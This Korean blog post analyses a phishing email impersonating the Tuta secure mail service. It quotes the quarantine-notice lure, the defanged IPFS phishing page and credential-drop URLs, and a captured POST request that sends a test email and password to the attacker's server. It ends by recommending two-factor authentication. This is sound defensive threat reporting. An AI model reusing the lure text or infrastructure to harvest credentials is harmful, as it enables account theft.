오늘은 독일에서 제공하는 보안 메일인 Tuta을 사칭을 하는 피싱 메일에 대해 글을 적어 보겠습니다.
일단 이번에는 구글 번역기를 사용한 것 같이 한국어로 왔습니다. 이제는 한국어 맞춤으로 작업을 하는 것 같은데 그래도 너는 피싱 메일이라는 것이 티가 납니다.
이번에는 매일 전달 오류와 차단된 수신 메시지이라고 돼 있으며 피싱(Phising) 내용은 다음과 같습니다.
피싱 메일 내용
차단된 수신 메시지
대기자 목록에 다음 메시지가 보관되어 있습니다.
이메일 격리에 11개의 새 메시지가 있습니다.. 날짜: 07/03/2024 08:22:00 -0700 (CDT) 사용자: ???????@tutanota(.)com
해제 시 를 클릭하면 다음 메시지가 받은 편지함 폴더로 해제됩니다. 메시지 전달
격리된 이메일
수신자: 제목: 날짜:
풀어 주다 ????>@tutanota(.)com ENC: Fwd: PAYMENT 05/03/2024
풀어 주다 ???@tutanota(.)com RE: BACK ORDER 05/03/2024
풀어 주다 ?????@tutanota(.)com Re: PROFORMA 06/03/2024
풀어 주다 ????/@tutanota(.)com RV: QUOTATION 06/03/2024
모든 메시지 전달 (11)
참고: 이 메시지는 알림용으로만 시스템에서 전송되었습니다. 답장하지 마세요
이 메시지가 스팸 폴더에 있는 경우 적절한 통합을 위해 받은 편지함 폴더로 이동하세요.: 여기를 클릭하세요.
돼 있으며 해당 메일에 있는 링크를 클릭하면 다음 피싱 사이트로 접속을 합니다.
https://cloudflare-ipfs(.)com/ipfs/bafybeibo5i6sp3vwinfkjtya5
es54m2bec5zz6wp4ehsbg7yfxbnckxko4/mega(.)html#?????@tutanota(.)com
입니다.
뭐 피싱 사이트에 접속을 하면 사용자의 개인정보를 탈취하기 위해서 미리 아이디는 준비돼 있으면 여기서 비밀번호를 입력하면 다음과 같이 내용을 나오고 실제로는 로그인이 되지 않고 비밀번호만 훔치게 설계돼 있습니다.
sign in with your email address and password to continue
Password in incorrect. Please try again
개인정보는 다음 사이트로 전송되는 것을 확인할 수가 있습니다.
https://edeaskates(.)co/jimi/mega(.)php그리고 Raw 값은 다음과 같습니다.
POST /jimi/mega(.)php HTTP/1.1
Host: edeaskates.co
User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/15.0 Chrome/90.0.4430.210 Mobile Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: hxxps://cloudflare-ipfs(.)com
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Accept-Encoding: gzip, deflate
Content-Length: 52
email=??????%40tutanota(.)com&password=TEST123123
피싱(Phising)메일을 보면 제목 옆에 contatti@yavinto(.)cc 이라고 돼 있어서 피싱 메일인 것을 한방에 확인할 수 있으면 그리고 제일 중요한 것은 반드시 2FA(2단계 인증)은 반드시 보안 업데이트를 통해서 업데이트를 하는 것을 정말로 권장합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| Unsaflok 취약점 으로 인한 해커가 수백만 개의 호텔 문을 잠금 해제할 수 있는 문제 (0) | 2024.03.26 |
|---|---|
| 윈도우 의 보안 수정 및 구글 업데이트 변경 사항이 포함된 Google Chrome 123(구글 크롬 123) 보안 업데이트 (0) | 2024.03.25 |
| 오라클 macOS 14.4 업데이트로 인해 Apple CPU에서 Java가 중단 경고 (0) | 2024.03.22 |
| Firefox 124.0(파이어폭스 124.0) 보안 업데이트 (0) | 2024.03.21 |
| EU 에서 iOS DMA 업데이트 후 설치 수가 증가 하고 있는 브레이브 브라우저 (0) | 2024.03.16 |
| 토르 브라우저 새로운 WebTunnel 브리지는 검열을 피하기 위해 HTTPS 트래픽을 모방 (0) | 2024.03.15 |
| 윈도우 10 KB5035845,윈도우 11 KB5035853 보안 업데이트 (0) | 2024.03.13 |
| 북한 해킹 단체 Konni(코니)에서는 만든 업비트 사칭 악성코드-첨부1_성명_개인정보수집이용동의서.docx.lnk(2024.03.07) (0) | 2024.03.11 |
